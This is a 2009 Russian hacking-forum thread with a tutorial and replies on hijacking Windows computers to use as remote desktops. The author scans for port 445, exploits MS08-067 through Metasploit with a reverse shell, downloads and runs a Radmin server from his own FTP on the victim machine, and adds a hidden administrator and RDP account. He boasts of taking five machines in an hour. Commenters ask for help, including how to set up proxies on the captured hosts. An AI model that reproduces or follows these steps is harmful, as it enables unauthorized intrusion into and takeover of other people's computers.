ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Дедик или поможет нам Metasploit 3.2
  #1  
Старый 05.01.2009, 22:01
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию Дедик или поможет нам Metasploit 3.2

Начну с того порядком уже надоело читать как люди ищут дедик , просят их , я уже писал , что мы ходим по этим дедикам , проксям и тд и тп .

Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapi который использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо !



Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,




Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы





Предположим что FTP сервер у нас установлен и настроен , в cmd пишем

Код:
C:\>ftp
ftp> o
К 10.xx.xx.xx
Связь с 10.xx.xx.xx .
220 Welcome to 10.xx.xx.xx   FTP service.
Пользователь (10.xx.xx.xx :(none)): anonymous
230 Login successful.
ftp>
Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой

PHP код:
dir 
Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы



Код:
get sys.exe
bye
Файл залит , выходим с фтп и возвращаемся а наш шелл



смотрим залит ли файл



и запускаем его


PHP код:
C:\>sys.exe 


Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу



Замечательно конект есть , вбиваем наш пароль и вот мы дома



Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную


PHP код:
cmd
net user user pass 
/add
net localgroup Administrators user 
/add
net localgroup 
"Remote Desktop Users" user /add
net accounts 
/maxpwage:unlimited
exit 


Далее радмином в режиме "Телнет " запустим наш terminal.exe



Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику



Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50



Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники
Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !





ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей !

Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/

про Terminal.exe здесь http://forum.antichat.ru/thread36042.html

Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие .

источник stopxaker.ru

Последний раз редактировалось stopxaker; 16.03.2009 в 21:26..
 
Ответить с цитированием

  #2  
Старый 05.01.2009, 23:34
Аватар для qazer
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333

Репутация: 112
По умолчанию

скачал,жму в поиске MS08-067_netapi говорит нету((
 
Ответить с цитированием

  #3  
Старый 05.01.2009, 23:37
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию

Цитата:
Сообщение от qazer  
скачал,жму в поиске MS08-067_netapi говорит нету((
Есть, смотри внимательней "Metasploit 3.2>GUI>Exploits>Windows>SMB>MS08-067_netapi "
 
Ответить с цитированием

  #4  
Старый 06.01.2009, 00:00
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

Ето так должно или у меня чето нетак???
Установил запуснил отклылся СМД и бегут строки0_о минут так 5 уже0_о
мне аж страшно))) если оно будет работать (метасплойт) выложу предложения как проще етим способом завладеть дедом) токо щас протестирую его)
 
Ответить с цитированием

  #5  
Старый 06.01.2009, 00:06
Аватар для zen-zen
zen-zen
Новичок
Регистрация: 29.06.2008
Сообщений: 23
Провел на форуме:
380573

Репутация: 5
По умолчанию

Цитата:
Сообщение от qazer  
скачал,жму в поиске MS08-067_netapi говорит нету((
ищи netapi )) Именно так я его нашёл
 
Ответить с цитированием

  #6  
Старый 06.01.2009, 00:10
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию

Цитата:
Сообщение от zifanchuck  
Ето так должно или у меня чето нетак???
Установил запуснил отклылся СМД и бегут строки0_о минут так 5 уже0_о
Так и должно быть , после этого запустить ruby.exe и откроется GUI
 
Ответить с цитированием

  #7  
Старый 06.01.2009, 00:11
Аватар для qazer
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333

Репутация: 112
По умолчанию

уже нашёл)всем спс.тока блин,уже полчаса сканю диапазоны - ни одного 445 порта...(
 
Ответить с цитированием

  #8  
Старый 06.01.2009, 00:31
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

а если получил я шел как через него проксию установить???
или прогу какую кидать?
 
Ответить с цитированием

  #9  
Старый 06.01.2009, 00:37
Аватар для qazer
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333

Репутация: 112
По умолчанию

мож ктонить подскажет диапазончик,где 445 есть?
 
Ответить с цитированием

  #10  
Старый 06.01.2009, 00:38
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Цитата:
Сообщение от zifanchuck  
а если получил я шел как через него проксию установить???
или прогу какую кидать?
Юзай консольный сокc, инфа по теме:
http://vfose.hsdn.org/forum/viewtopic.php?f=8&t=266&sid=8b2e00d52d102173376fa7 c19e8bfead
можно заюзать 3proxy http://3proxy.ru/download/

Последний раз редактировалось -=lebed=-; 06.01.2009 в 00:43..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
асм, дизасм, принцип работы процов на определенном уровне. Cthulchu Аппаратное обеспечение 0 05.01.2009 20:14
Хакеры и кракеры или "Что такое хорошо и что такое плохо?" foreva Чужие Статьи 12 09.02.2008 12:26
Обнаружение Sql инъекций и Css атак k00p3r Чужие Статьи 0 12.06.2005 20:43
На счет халявного инета foreva Чужие Статьи 0 06.02.2005 12:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ